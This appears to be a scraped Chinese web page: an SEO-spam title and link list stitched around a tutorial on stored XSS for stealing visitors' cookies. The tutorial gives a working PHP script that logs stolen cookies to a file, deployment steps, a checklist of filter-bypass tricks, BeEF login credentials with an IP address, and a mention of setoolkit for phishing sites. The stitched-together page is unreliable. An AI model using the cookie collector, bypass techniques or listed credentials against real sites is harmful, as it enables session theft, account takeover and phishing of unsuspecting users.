当前位置: 首页 > news >正文

简单网站制作实例河北seo推广公司

简单网站制作实例,河北seo推广公司,做的网站每年需要续费,生猪价格今日猪价最新走势图XSS脚本(存储型xss获取肉鸡的cookies) 存储型XSS就是在能够提交上传的文本框中提交一些标签代码,这段代码被插入到页面中,肉鸡每次点击这个页面时都会有弹框弹出。(只要点击就会弹框) 反射性XSS顾名思义插入…

XSS脚本(存储型xss获取肉鸡的cookies)
存储型XSS就是在能够提交上传的文本框中提交一些标签代码,这段代码被插入到页面中,肉鸡每次点击这个页面时都会有弹框弹出。(只要点击就会弹框)
反射性XSS顾名思义插入

vim /var/www/html/cookie_rec.php

<?php $cookie = $_GET['cookie']; $log = fopen('cookie.txt',"a"); fwrite($log, $cookie . "\n"); fclose($log); ?>

2、增加目录权限

chown -R www-data.www-data /var/www
3、访问靶机

4、之后,当有人访问这个页面时就会有弹框

存储型Xss排查思路:
1、首先依次排查标签是否被禁用(script、img、iframe等)
绕过思路:

标签大小写
标签转义、双重转义、加密
替换关键字
使用编码(十六进制、二次编码、Unicode编码)
2、测试排查某些符号是否被禁用转义(尖括号、引号、空格、等号)
绕过思路:

对符号进行编码
转义、双重转义、尖括号闭合
加密
使用注释
重音符(`)来包含代码
内嵌TAB、换行符等分割攻击代码
3、检查xss的验证机制,是通过前端验证或是后端验证、还是前后端均验证。
排查思路:

查看HTML源码前端是否存在某些限制文本框长度、符号分割(空格,逗号等)、标签禁用、符号禁用、标签符号过滤等JS或方法
使用burpsuite绕过前端,发起请求
4、针对1、2、3过程的排查,进行针对性的注入
常见注入:

标签闭合
注释、字符转义
事件处理程序
编码
协议绕过
内嵌(TAB、回车)
参考:https://www.freebuf.com/articles/web/153055.html

BeEf工具的使用:

注入的语句:

账号密码:beef : debian4eva
UI地址:http://139.198.21.183:8808/ui/authentication

setookit制作钓鱼网站工具

http://www.tj-hxxt.cn/news/17990.html

相关文章:

  • 有那种网站的浏览器发布外链
  • 黑客网站盗qq宁夏百度公司
  • 法院网站管理系统源码国内新闻大事20条简短
  • 做网站智能工具天津百度推广代理商
  • 医院做网站的意义怎么找当地的地推团队
  • 威宁网站建设企业查询官网
  • 用easyui做的网站信息流广告投放渠道
  • 工业设计就业广东培训seo
  • 世界十大网站开发公司北京网站优化服务
  • wordpress关注插件西安seo优化工作室
  • 怎么做dnf辅助网站百度推广官网登录
  • 网站建设的公司开发方案网站关键词优化软件效果
  • 公司的网站如何建设百度竞价推广屏蔽软件
  • 交友网站建设百度seo工作室
  • 闵行做网站公司铝棒易站公司站长工具网站查询
  • app定制价格保定seo网络推广
  • 昌平网站制作怎么注册电商平台
  • 北京代做网站搜索引擎优化概述
  • 国外做任务赚钱的网站网站排名优化方法
  • 网站开发职业总结百度网盘网页版登录首页
  • 各行各业网站建设独立国际军事最新头条新闻
  • 网站数据统计郑州网络seo公司
  • 百度推广自己做网站龙岩seo
  • 青岛黄岛区做网站设计的免费推广
  • 网站托管工作室海口网站关键词优化
  • 网站后台更新文章 前台不显示百度竞价ocpc
  • 浙江公铁建设工程有限公司网站产品怎么进行推广
  • 聊城做网站价位怎么在百度上推广自己的产品
  • 做行业网站赚钱东莞寮步最新通知
  • 建设银行官方网站首页网站模板商城